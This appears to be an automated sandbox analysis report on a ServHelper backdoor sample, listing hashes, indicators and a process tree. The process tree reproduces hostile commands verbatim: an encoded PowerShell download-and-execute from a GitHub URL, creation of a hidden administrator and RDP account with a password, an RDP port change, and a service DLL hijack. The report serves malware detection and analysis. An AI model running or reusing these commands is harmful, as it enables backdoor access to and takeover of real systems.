Analysis
-
max time kernel
132s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10-04-2024 14:06
Static task
static1
Behavioral task
behavioral1
Sample
c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe
Resource
win10v2004-20240226-en
General
-
Target
c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe
-
Size
7.0MB
-
MD5
f19b9d6b74f65125623613a334baba76
-
SHA1
8b1428daa9a7d2231663784c2e0457034dbdd468
-
SHA256
c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90
-
SHA512
f993b7002c952cc754d86726031052fde8dcdda6ce29b35aca9f8318e390c86b370f2519cb4ec2374e24645772ef6dfbbb4bcf25c49587e4b5d678588c5a3fd4
-
SSDEEP
196608:9gwCUo86gyVJHh22fiIUrKqJGZdwInqqwgrSPn:9pv6g+JHhu1WVZdwIqqdr
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2320 powershell.exe 6 2320 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 744 icacls.exe 1132 icacls.exe 660 takeown.exe 1512 icacls.exe 2988 icacls.exe 2796 icacls.exe 2808 icacls.exe 2112 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1044 1044 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2112 icacls.exe 744 icacls.exe 1132 icacls.exe 660 takeown.exe 1512 icacls.exe 2988 icacls.exe 2796 icacls.exe 2808 icacls.exe -
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 4 raw.githubusercontent.com 5 raw.githubusercontent.com 6 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 9 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LFUDE79EPF7EZKWHGT17.temp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 4 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0ce4479508bda01 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3020 powershell.exe 2464 powershell.exe 1464 powershell.exe 2660 powershell.exe 3020 powershell.exe 3020 powershell.exe 3020 powershell.exe 2320 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 468 1044 1044 1044 1044 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 3020 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeRestorePrivilege 2988 icacls.exe Token: SeAssignPrimaryTokenPrivilege 2416 WMIC.exe Token: SeIncreaseQuotaPrivilege 2416 WMIC.exe Token: SeAuditPrivilege 2416 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2416 WMIC.exe Token: SeIncreaseQuotaPrivilege 2416 WMIC.exe Token: SeAuditPrivilege 2416 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2684 WMIC.exe Token: SeIncreaseQuotaPrivilege 2684 WMIC.exe Token: SeAuditPrivilege 2684 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2684 WMIC.exe Token: SeIncreaseQuotaPrivilege 2684 WMIC.exe Token: SeAuditPrivilege 2684 WMIC.exe Token: SeDebugPrivilege 2320 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 2772 wrote to memory of 3020 2772 c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe powershell.exe PID 2772 wrote to memory of 3020 2772 c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe powershell.exe PID 2772 wrote to memory of 3020 2772 c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe powershell.exe PID 3020 wrote to memory of 2944 3020 powershell.exe csc.exe PID 3020 wrote to memory of 2944 3020 powershell.exe csc.exe PID 3020 wrote to memory of 2944 3020 powershell.exe csc.exe PID 2944 wrote to memory of 2704 2944 csc.exe cvtres.exe PID 2944 wrote to memory of 2704 2944 csc.exe cvtres.exe PID 2944 wrote to memory of 2704 2944 csc.exe cvtres.exe PID 3020 wrote to memory of 2464 3020 powershell.exe powershell.exe PID 3020 wrote to memory of 2464 3020 powershell.exe powershell.exe PID 3020 wrote to memory of 2464 3020 powershell.exe powershell.exe PID 3020 wrote to memory of 1464 3020 powershell.exe powershell.exe PID 3020 wrote to memory of 1464 3020 powershell.exe powershell.exe PID 3020 wrote to memory of 1464 3020 powershell.exe powershell.exe PID 3020 wrote to memory of 2660 3020 powershell.exe powershell.exe PID 3020 wrote to memory of 2660 3020 powershell.exe powershell.exe PID 3020 wrote to memory of 2660 3020 powershell.exe powershell.exe PID 3020 wrote to memory of 660 3020 powershell.exe takeown.exe PID 3020 wrote to memory of 660 3020 powershell.exe takeown.exe PID 3020 wrote to memory of 660 3020 powershell.exe takeown.exe PID 3020 wrote to memory of 1512 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 1512 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 1512 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 2988 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 2988 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 2988 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 2796 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 2796 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 2796 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 2808 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 2808 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 2808 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 2112 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 2112 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 2112 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 744 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 744 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 744 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 1132 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 1132 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 1132 3020 powershell.exe icacls.exe PID 3020 wrote to memory of 2292 3020 powershell.exe reg.exe PID 3020 wrote to memory of 2292 3020 powershell.exe reg.exe PID 3020 wrote to memory of 2292 3020 powershell.exe reg.exe PID 3020 wrote to memory of 2256 3020 powershell.exe reg.exe PID 3020 wrote to memory of 2256 3020 powershell.exe reg.exe PID 3020 wrote to memory of 2256 3020 powershell.exe reg.exe PID 3020 wrote to memory of 440 3020 powershell.exe reg.exe PID 3020 wrote to memory of 440 3020 powershell.exe reg.exe PID 3020 wrote to memory of 440 3020 powershell.exe reg.exe PID 3020 wrote to memory of 2140 3020 powershell.exe net.exe PID 3020 wrote to memory of 2140 3020 powershell.exe net.exe PID 3020 wrote to memory of 2140 3020 powershell.exe net.exe PID 2140 wrote to memory of 600 2140 net.exe net1.exe PID 2140 wrote to memory of 600 2140 net.exe net1.exe PID 2140 wrote to memory of 600 2140 net.exe net1.exe PID 3020 wrote to memory of 1656 3020 powershell.exe cmd.exe PID 3020 wrote to memory of 1656 3020 powershell.exe cmd.exe PID 3020 wrote to memory of 1656 3020 powershell.exe cmd.exe PID 1656 wrote to memory of 2128 1656 cmd.exe cmd.exe PID 1656 wrote to memory of 2128 1656 cmd.exe cmd.exe PID 1656 wrote to memory of 2128 1656 cmd.exe cmd.exe PID 2128 wrote to memory of 2028 2128 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe"C:\Users\Admin\AppData\Local\Temp\c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2-mldfjn.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7E4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA7E3.tmp"4⤵PID:2704
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:660
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1512
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2796
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2808
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2112
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:744
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1132
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2292
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:2256
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:440
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:600
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:2028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2792
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:2036
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1504
-
C:\Windows\system32\net.exenet start TermService5⤵PID:892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:876
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:572
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2376
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:1668
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:2236
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1816
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc DhcSvJI0 /add1⤵PID:2260
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc DhcSvJI0 /add2⤵PID:2852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc DhcSvJI0 /add3⤵PID:1392
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:2996
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:1488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:2160
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD1⤵PID:2840
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD2⤵PID:1568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD3⤵PID:1688
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:2940
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:2876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:3052
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc DhcSvJI01⤵PID:2156
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc DhcSvJI02⤵PID:2272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc DhcSvJI03⤵PID:1636
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2560
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2708
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2604
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2576
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD548a7bd710c23b05ac5ed1501b72cafc3
SHA1de8ea26d3b921542cd9e62b56f8bfc0e95244903
SHA25638ed33261d6c4df69c523b3b7ae178938095f1272d6cb6efe00437279343b9d7
SHA512e1bf899302a010050c8fbec005418eadcff509c44caa3b208c016fd804676938a734d1618c4692f16bf29df8846702f1adee5d47de38317b68f9e830e64cb190
-
Filesize
7KB
MD57877645b743b086b260a2fd513157dc9
SHA198e44e88b0de7cf1c275712cab5e57f9bd056a79
SHA2560e5b3547391614ec9f993d3e2420a5aa2ef2ffd70679052ebda480907a791bb1
SHA512de87ebb09cffe1600c3dfa2c5e7c9f2e5641c5cdc9f47a486994c93b9133302b588dffdff1c213ad3311ae910a6ad3b76a44c3fdae187b1d5818db10f1683bb8
-
Filesize
1KB
MD5b9dc7fbff1dd8dc9cd1bc8b85da0dfbb
SHA19f243e6d49cfb33c226f39ed330bde651cf0c993
SHA256575e789877ffdef8802ad067829ff9d77105ea617d27d1407ba2bf02deb1f921
SHA512d7c80cc05706a5124e33d46bdaaeeb208b05015dc8bba621f097aac619c57edf2c8862994a982bac1aabdc935da8d83846f5a4c16687aedb297c99930f7e33bb
-
Filesize
1KB
MD53447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
Filesize
2.5MB
MD5267dcb46e91e0272aab1994b2cf3c9d8
SHA17904af5372cec88161ce77f474d2e5deb119821e
SHA256c319e5b97653ef90e065aaac0c0ad5d2d3a2bfa3de4ccb6abe16d9437b941a21
SHA51244c76b401ded2501a18e624b95599945768b58f0c04cd500b4713231b19657352f11c16a0abf5dab18403db162aa07c7f55404beacf86da73dad83cea969cdf8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52f740227e0ba041e02a822410031c104
SHA185368de0e24a2b3c8b411780ce69ee936c0b28b9
SHA256c423be5b14a61e853a464c81f5df6973d657b7a32192330d15d942b5cd71a9ac
SHA512cc228571599bd8fb471536c78e2eba58bb8786ca186501f852d8d8ee96b46aba2692a593419390b03d1e5b7bed9710beaa50e634194e7efd2bb6d81018410fcf
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
424B
MD54864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
Filesize
309B
MD50e44284d1c8b3b8e9a0ba796963527ab
SHA147fc782d534ef98c4ff520dca899bc98a0ce332a
SHA256df8a1644c7959410e4fe3e57e797294159ee12f8f8c13f2b2c890bccd5a1dc7f
SHA512b2a8dedc531ba0e6779ec20d3a435f6a7447dd86cefa5d3061e88853a988b6830490057bed9023087c115e141eca2084217e85f3935115ce43f3d034de7d79e6
-
Filesize
652B
MD51bde6727fbc4a1433e6cc676652dc420
SHA1a3fb27bf8773fe71b1c943a7aac18568d7a8d7aa
SHA256f99a133f23ba5b91711e6814d971d058da32ec3ca260e409c0866e6c51e63b72
SHA5129ba406eb3e8da0bfa6d2ac1f952f60a8b85667af1e3932cb91a51f35096b159fb438a82683f717c005fc4a0e6212e1b919fc2284c3f12c639e2be9c5ff64a6fa
-
Filesize
60KB
MD5c678a2362862a3207f41213684b4923c
SHA1d33bd5dd67c81d7da3582eeab75702ae9d0d4bf8
SHA25618b4505916f75075a71d5d94e9fcd18e5e283690f3e6f06f8a3cb4c4d557dc76
SHA512a4dc8c2fd294433016cf88a9b830940c78ecec0b600d4f2480a1bf68a3817160e188bc1c06e913bf475ed90021bf464ed9cdf1a7ce53977c12c6679650f37a53
-
Filesize
743KB
MD522d3d81009b0fbcc977658e4a392c17c
SHA11f3f415cb3493bcb02fff0368f2f4a4bc91b8bc1
SHA2569ebeb231fc50b2739a7d96c3f761cbdacdc003361fa69c6330ea83b619d35a07
SHA512ff89e594e2e797516379c29fee5181e0de3b9a03c7c03e09da0ad26bf27e0e405164f24ee7a7caf09cb264b228ddfb6a685b741a4f1545256e21d239284817ee